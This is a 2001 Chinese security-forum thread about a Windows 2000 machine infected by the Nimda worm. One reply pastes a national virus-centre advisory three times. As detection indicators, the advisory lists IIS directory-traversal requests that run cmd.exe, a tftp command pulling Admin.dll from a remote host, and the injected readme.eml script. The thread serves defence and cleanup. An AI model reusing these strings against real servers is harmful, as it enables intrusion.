社区
安全技术/病毒
帖子详情
老天啊,病毒杀不干净了!
withstudy
2001-10-13 06:14:29
我的电脑中毒了,每个硬盘的根目录都会自动生成一个叫ADMIN。DLL的文件,我用金山毒霸杀了很多次都杀不净,不知道它藏在那里,只要一上网包准发作,谁知道这个病毒是什么病毒,哪个杀毒软件比较管用一些,我的平台是W2K SERVER,那里有共享杀毒软件好用的介绍一下。
...全文
176
7
打赏
收藏
老天啊,病毒杀不干净了!
我的电脑中毒了,每个硬盘的根目录都会自动生成一个叫ADMIN。DLL的文件,我用金山毒霸杀了很多次都杀不净,不知道它藏在那里,只要一上网包准发作,谁知道这个病毒是什么病毒,哪个杀毒软件比较管用一些,我的平台是W2K SERVER,那里有共享杀毒软件好用的介绍一下。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
7 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
honeyoung
2001-10-14
打赏
举报
回复
NIMDA蠕虫解决方案
http://www.antivirus-china.org.cn/content/nimda_changjiafangan.htm
国家计算机病毒应急处理中心提供的解决方案。
一、攻击的目标系统:
该病毒可以感染Windows 95, 98, ME, NT,或者2000 ,以及 Windows NT and 2000服务器。
二、传播方式:
1、通过邮件传播出,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经执行了。
2、利用了IIS的漏洞,采用与“红色代码II”和“蓝色代码”类似的方式,
通过网络传播。
3、通过局域网的共享传播到其他系统。
4、感染EXE文件。
5、在html、asp文件中插入如下内容:
<html><scriptlanguage="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
使得用户浏览感染病毒的网站时,导致用户感染此病毒。
三、如何判定感染Nimda蠕虫病毒
1、感染此病毒的NT和2000服务器,在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的
日志文件中含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
GET, /scripts/..%5c../winnt/system32/cmd.exe
如果日志存在以下内容,则表明该系统已受到感染,
/c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:\Admin.dll
2、感染病毒的Windows NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws 的文件,长度为78K。在各个分区的根目录下存在Admin.dll文件(如:c:\admin.dll、 d:\admin.dll),其文件长度为56K(57344字节) 。在system目录下存在mmc.exe文件 ,文件长度也为56K。在c:\innetpub\scripts目录下存在tftpxxx的文件。这些都是病毒 代码。
3、Windows 9X系统中的system.ini文件内容被修改
正常情况为:Shell = explorer.exe
感染病毒后变为:Shell = explorer.exe load.exe -dontrunold
4、在Windows 9x系统下,存在如下文件load.exe、 riched20.dll,这些文件都是系统的 ,隐含的属性,需要修改文件 。磁盘的可写目录中存在很多后缀为eml的文件。
5、感染病毒的系统中,在c:\tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这 些都是病毒代码。
四、解决方案 :
1、与网络断开,同时去掉磁盘的网络共享,防止进一步通过内网传染。
2、下载安装补丁程序
对于安装IIS的NT/2000服务器,要下载安装如下补丁:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
对于所有的IE浏览器(5.0版本以上的系统),要下载安装如下补丁:
Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
3、Windows 9x系统需要将system.ini中的Shell = explorer.exe load.exe -dontrunold 改为
Shell = explorer.exe
4、删除wininit.ini文件中的内容。
5、用干净的 Riched20.DLL(大约100k)文件替换染毒的同名Riched20.DLL文件(57344字节),或重装Office。
6、如果使用的是WinNT或者Win2000,打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除。
7、升级杀毒软件,然后使用杀毒软件清除系统中的病毒程序,必须注意由于杀读软件缺省 设置是检测程序文件,为了防止漏杀eml、tmp等带毒文件,清务必将杀毒软件设置为检 测、清除所有文件。
8、检测清除后,请重新启动系统,再次检查系统中是否还存在第三项中2、4、5子项中描 述的病毒文件。如果没有则表明已清除病毒。
9、NT/2000用户还需检查在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否还含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
10、安装了邮件防病毒网关的邮件服务器要及时进行升级,可有效防止病毒从邮件传播。
如果存在这些内容,则表明系统还在遭受其他染毒系统的攻击,但是不会再感染病毒。请将日志文件发给我中心,以协助我们通知其他感染病毒的用户。
计算机病毒防治产品检验中心暨国家计算机病毒应急处理中心目前正在密切监视该病毒的发展动向,目前,已有瑞星公司、趋势科技公司、金山公司、冠群金辰公司、北信源公司江民公司、上海创源公司报告了该病毒的处理方案。其中瑞星和北信源、金山公司的清毒工具已经确认可行
honeyoung
2001-10-14
打赏
举报
回复
NIMDA蠕虫解决方案
http://www.antivirus-china.org.cn/content/nimda_changjiafangan.htm
国家计算机病毒应急处理中心提供的解决方案。
一、攻击的目标系统:
该病毒可以感染Windows 95, 98, ME, NT,或者2000 ,以及 Windows NT and 2000服务器。
二、传播方式:
1、通过邮件传播出,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经执行了。
2、利用了IIS的漏洞,采用与“红色代码II”和“蓝色代码”类似的方式,
通过网络传播。
3、通过局域网的共享传播到其他系统。
4、感染EXE文件。
5、在html、asp文件中插入如下内容:
<html><scriptlanguage="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
使得用户浏览感染病毒的网站时,导致用户感染此病毒。
三、如何判定感染Nimda蠕虫病毒
1、感染此病毒的NT和2000服务器,在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的
日志文件中含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
GET, /scripts/..%5c../winnt/system32/cmd.exe
如果日志存在以下内容,则表明该系统已受到感染,
/c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:\Admin.dll
2、感染病毒的Windows NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws 的文件,长度为78K。在各个分区的根目录下存在Admin.dll文件(如:c:\admin.dll、 d:\admin.dll),其文件长度为56K(57344字节) 。在system目录下存在mmc.exe文件 ,文件长度也为56K。在c:\innetpub\scripts目录下存在tftpxxx的文件。这些都是病毒 代码。
3、Windows 9X系统中的system.ini文件内容被修改
正常情况为:Shell = explorer.exe
感染病毒后变为:Shell = explorer.exe load.exe -dontrunold
4、在Windows 9x系统下,存在如下文件load.exe、 riched20.dll,这些文件都是系统的 ,隐含的属性,需要修改文件 。磁盘的可写目录中存在很多后缀为eml的文件。
5、感染病毒的系统中,在c:\tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这 些都是病毒代码。
四、解决方案 :
1、与网络断开,同时去掉磁盘的网络共享,防止进一步通过内网传染。
2、下载安装补丁程序
对于安装IIS的NT/2000服务器,要下载安装如下补丁:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
对于所有的IE浏览器(5.0版本以上的系统),要下载安装如下补丁:
Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
3、Windows 9x系统需要将system.ini中的Shell = explorer.exe load.exe -dontrunold 改为
Shell = explorer.exe
4、删除wininit.ini文件中的内容。
5、用干净的 Riched20.DLL(大约100k)文件替换染毒的同名Riched20.DLL文件(57344字节),或重装Office。
6、如果使用的是WinNT或者Win2000,打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除。
7、升级杀毒软件,然后使用杀毒软件清除系统中的病毒程序,必须注意由于杀读软件缺省 设置是检测程序文件,为了防止漏杀eml、tmp等带毒文件,清务必将杀毒软件设置为检 测、清除所有文件。
8、检测清除后,请重新启动系统,再次检查系统中是否还存在第三项中2、4、5子项中描 述的病毒文件。如果没有则表明已清除病毒。
9、NT/2000用户还需检查在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否还含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
10、安装了邮件防病毒网关的邮件服务器要及时进行升级,可有效防止病毒从邮件传播。
如果存在这些内容,则表明系统还在遭受其他染毒系统的攻击,但是不会再感染病毒。请将日志文件发给我中心,以协助我们通知其他感染病毒的用户。
计算机病毒防治产品检验中心暨国家计算机病毒应急处理中心目前正在密切监视该病毒的发展动向,目前,已有瑞星公司、趋势科技公司、金山公司、冠群金辰公司、北信源公司江民公司、上海创源公司报告了该病毒的处理方案。其中瑞星和北信源、金山公司的清毒工具已经确认可行
honeyoung
2001-10-14
打赏
举报
回复
NIMDA蠕虫解决方案
http://www.antivirus-china.org.cn/content/nimda_changjiafangan.htm
国家计算机病毒应急处理中心提供的解决方案。
一、攻击的目标系统:
该病毒可以感染Windows 95, 98, ME, NT,或者2000 ,以及 Windows NT and 2000服务器。
二、传播方式:
1、通过邮件传播出,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经执行了。
2、利用了IIS的漏洞,采用与“红色代码II”和“蓝色代码”类似的方式,
通过网络传播。
3、通过局域网的共享传播到其他系统。
4、感染EXE文件。
5、在html、asp文件中插入如下内容:
<html><scriptlanguage="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
使得用户浏览感染病毒的网站时,导致用户感染此病毒。
三、如何判定感染Nimda蠕虫病毒
1、感染此病毒的NT和2000服务器,在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的
日志文件中含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
GET, /scripts/..%5c../winnt/system32/cmd.exe
如果日志存在以下内容,则表明该系统已受到感染,
/c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:\Admin.dll
2、感染病毒的Windows NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws 的文件,长度为78K。在各个分区的根目录下存在Admin.dll文件(如:c:\admin.dll、 d:\admin.dll),其文件长度为56K(57344字节) 。在system目录下存在mmc.exe文件 ,文件长度也为56K。在c:\innetpub\scripts目录下存在tftpxxx的文件。这些都是病毒 代码。
3、Windows 9X系统中的system.ini文件内容被修改
正常情况为:Shell = explorer.exe
感染病毒后变为:Shell = explorer.exe load.exe -dontrunold
4、在Windows 9x系统下,存在如下文件load.exe、 riched20.dll,这些文件都是系统的 ,隐含的属性,需要修改文件 。磁盘的可写目录中存在很多后缀为eml的文件。
5、感染病毒的系统中,在c:\tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这 些都是病毒代码。
四、解决方案 :
1、与网络断开,同时去掉磁盘的网络共享,防止进一步通过内网传染。
2、下载安装补丁程序
对于安装IIS的NT/2000服务器,要下载安装如下补丁:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
对于所有的IE浏览器(5.0版本以上的系统),要下载安装如下补丁:
Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
3、Windows 9x系统需要将system.ini中的Shell = explorer.exe load.exe -dontrunold 改为
Shell = explorer.exe
4、删除wininit.ini文件中的内容。
5、用干净的 Riched20.DLL(大约100k)文件替换染毒的同名Riched20.DLL文件(57344字节),或重装Office。
6、如果使用的是WinNT或者Win2000,打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除。
7、升级杀毒软件,然后使用杀毒软件清除系统中的病毒程序,必须注意由于杀读软件缺省 设置是检测程序文件,为了防止漏杀eml、tmp等带毒文件,清务必将杀毒软件设置为检 测、清除所有文件。
8、检测清除后,请重新启动系统,再次检查系统中是否还存在第三项中2、4、5子项中描 述的病毒文件。如果没有则表明已清除病毒。
9、NT/2000用户还需检查在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否还含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
10、安装了邮件防病毒网关的邮件服务器要及时进行升级,可有效防止病毒从邮件传播。
如果存在这些内容,则表明系统还在遭受其他染毒系统的攻击,但是不会再感染病毒。请将日志文件发给我中心,以协助我们通知其他感染病毒的用户。
计算机病毒防治产品检验中心暨国家计算机病毒应急处理中心目前正在密切监视该病毒的发展动向,目前,已有瑞星公司、趋势科技公司、金山公司、冠群金辰公司、北信源公司江民公司、上海创源公司报告了该病毒的处理方案。其中瑞星和北信源、金山公司的清毒工具已经确认可行
sanjiang
2001-10-14
打赏
举报
回复
还是最新的诺顿好使.
smartzhou
2001-10-13
打赏
举报
回复
你中"尼姆达"了,赶快杀毒,现在你的硬盘应该已经被共享了
具体解决办法:http://www.csdn.net/expert/topic/314/314251.shtm
某鸟
2001-10-13
打赏
举报
回复
杀不静?什么名字?
在DOS下杀看看!
honeyoung
2001-10-13
打赏
举报
回复
试一下最新的金山毒霸吧,或者是瑞星2002,
我也不太清楚你中的是什么毒,但是你试试吧,我也是刚从尼姆达的苦海里爬上来的!
《贼幸福》
第1节:第一章:寝室巨变(1) 第一章:寝室巨变 真是时光如水,岁月如歌啊!(好烂的词啊!) 转眼间,我刘山峰已经顺利地升入了大学四年级。顺利?这个词用的好。对!那是相当的顺利。...辅导员也只不
UNIX痛恨者手册
即使当成一本高级笑话书,也是很有价值的.UNIX痛恨者手册By Simson Garfinkel, Daniel Weise, Steven Strassmann第一章 UNIX世界上第一个电脑病毒“伯克利的两项最著名的产品是UNIX和LSD (一种毒品),我想这不是巧合...
Unix痛恨者手册
UNIX痛恨者手册By Simson Garfinkel, Daniel Weise, Steven Strassmann第一章 UNIX世界上第一个电脑病毒“伯克利的两项最著名的产品是UNIX和LSD (一种毒品),我想这不是巧合”病毒依赖于微小的个体和强大的适应性...
完全用 GNU/Linux 工作
完全用 GNU/Linux 工作 — 摈弃 Windows 低效率的工作方式,发掘 ...如果你只需要处理一般的事务,打游 戏,那么你不需要了解下面这些了。 我不是一个狂热的自由软件份子,虽然我很喜欢自由软件。这篇文章也不 是用
在我一生中最猥琐的时候遇见你(1)
他们还不知道哪里找来了一件金光闪闪的刺绣珠片露背吊带小背心给我穿上,露出我两条瘦骨嶙峋的胳膊和发育不良的胸脯,现在不像柴禾妞了,像吸毒吸得快要死掉的女人。 “这样……好看吗?”我疑惑的看着一旁笑得快要...
安全技术/病毒
9,506
社区成员
28,984
社区内容
发帖
与我相关
我的任务
安全技术/病毒
Windows专区 安全技术/病毒
复制链接
扫一扫
分享
社区描述
Windows专区 安全技术/病毒
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章